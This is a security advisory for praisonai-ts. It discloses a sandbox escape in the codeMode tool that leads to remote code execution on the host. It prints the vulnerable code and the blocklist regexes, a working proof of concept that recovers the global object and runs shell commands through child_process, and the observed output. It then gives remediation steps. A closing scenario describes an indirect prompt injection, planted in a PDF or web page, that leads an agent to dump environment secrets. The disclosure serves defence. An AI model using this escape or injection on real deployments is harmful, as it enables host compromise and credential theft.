GHSA-p69m-4f92-2v84: praisonai: sandbox escape in codeMode → full host RCE

## Summary The `codeMode` tool in `src/praisonai-ts/src/tools/builtins/code-mode.ts` uses `new Function()` with a `with(sandbox)` pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via `Function('return this')()` to recover the global object, followed by `global.require()` with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents. ## Details **Vulnerable code (lines 187–191):** ```typescript const fn = new Function( 'sandbox', `with (sandbox) { ${code} }` ); const result = fn(sandbox); ``` The `code` parameter comes from LLM tool call arguments (the `execute` method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136): ```typescript const blockedPatterns = [ /require\s*\(\s*['"]child_process['"]\s*\)/, /require\s*\(\s*['"]fs['"]\s*\)/, /import\s+.*from\s+['"]child_process['"]/, /process\.exit/, /eval\s*\(/, ]; ``` **Three fundamental weaknesses:** 1. **`with(sandbox)` does not provide isolation.** The `with` statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets `process: undefined` and `require: undefined`, but these are recovered via the global scope: ```javascript const g = Function('return this')(); g.require('child_' + 'process') ``` 2. **Blocklist evasion via string concatenation.** The regex `/require\s*\(\s*['"]child_process['"]\s*\)/` requires the literal string `'child_process'` or `"child_process"` inside `require()`. Using `require('child_' + 'process')` bypasses this because the regex sees a variable concatenation, not a literal string. 3. **`Function('return this')()` is not blocked.** None of the blocklist patterns match `Function(`, `return this`, or `global.require`. ## PoC **Setup:** Clean checkout at commit `d5f1114a`, Node.js v20.20.0 (tested environment). **Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):** ```javascript // This code bypasses ALL blocklist patterns and achieves RCE: const code = ` const Func = (function(){}).constructor; const proc = Func('return process')(); console.log('process.version:', proc.version); const g = Function('return this')(); const mod = 'child_' + 'process'; const cp = g.require(mod); console.log('RCE:', cp.execSync('id').toString().trim()); `; ``` **Observed output (executed in this environment):** ``` OUT: process.version: v20.20.0 OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama) ``` The escape was confirmed by executing the exact code-mode sandbox pattern (`new Function('sandbox', 'with (sandbox) { ... }')`) with the blocklist applied first. ALL blocklist patterns were bypassed, and the `id` command returned the real system user ID. **Negative control — blocklist correctly catches direct require:** ```javascript const code = `require('child_process')`; // Returns: "Blocked pattern detected: require\s*\(\s*['"]child_process['"]\s*\)" ``` **Negative control — blocklist correctly catches eval:** ```javascript const code = `eval('process')`; // Returns: "Blocked pattern detected: eval\s*\(" ``` **Cleanup:** No persistence needed; the code runs in-process. ## Impact An attacker who can influence the `code` parameter of the `codeMode` tool (via crafted prompts to an AI agent using praisonai-ts) achieves **full arbitrary code execution** on the host system. This includes: - **Read/write any file** accessible to the process user - **Execute arbitrary system commands** via `child_process` - **Exfiltrate environment variables** containing API keys, tokens, and credentials - **Install persistent backdoors** by writing to startup files - **Move laterally** in containerized environments ## Suggested remediation The `with(sandbox)` + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with: 1. **Use `vm` module with proper context isolation:** ```typescript import { createContext, runInContext } from 'vm'; const sandbox = createContext({ /* safe globals only */ }); runInContext(code, sandbox, { timeout: 5000 }); ``` 2. **Or use `isolated-vm`** for true process-level isolation with separate V8 isolates. 3. **Or run code in a subprocess** (like the Python `_execute_code_sandboxed` pattern already used in `python_tools.py`) with a clean environment and resource limits. 4. If a blocklist approach must be retained, add patterns for: - `Function(` / `new Function` - `constructor` / `__proto__` / `prototype` - `return this` / `return global` - `global` / `globalThis` / `window` But note: blocklist approaches are inherently fragile and will continue to have bypasses.

An adversary targets an organization running a PraisonAI agent with codeMode enabled that processes external documents or user queries. Via an indirect prompt injection payload embedded in a PDF or web page the agent reads, the adversary causes the LLM to emit JavaScript that: (1) calls Function('return this')() to recover the Node.js global object, bypassing the sandbox's undefined process and require bindings; (2) constructs the module name as 'child_' + 'process' to evade the literal-string regex blocklist; (3) invokes global.require('child_' + 'process').execSync('env').toString() to exfiltrate all environment variables in a single call, capturing OPENAI_API_KEY, AWS_ACCESS_KEY_ID, DATABASE_URL, and similar high-value secrets. With those credentials the adversary pivots to cloud infrastructure, deploys a reverse shell for persistent access, or sells the API keys. The entire exploit requires no authentication and executes in milliseconds.